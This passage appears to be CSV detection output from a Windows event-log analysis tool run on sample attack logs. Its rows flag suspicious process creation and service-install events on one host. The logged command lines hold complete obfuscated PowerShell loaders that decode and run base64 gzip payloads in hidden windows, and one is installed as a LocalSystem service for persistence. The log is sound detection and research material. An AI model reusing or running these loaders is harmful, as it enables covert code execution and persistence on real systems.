iQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlv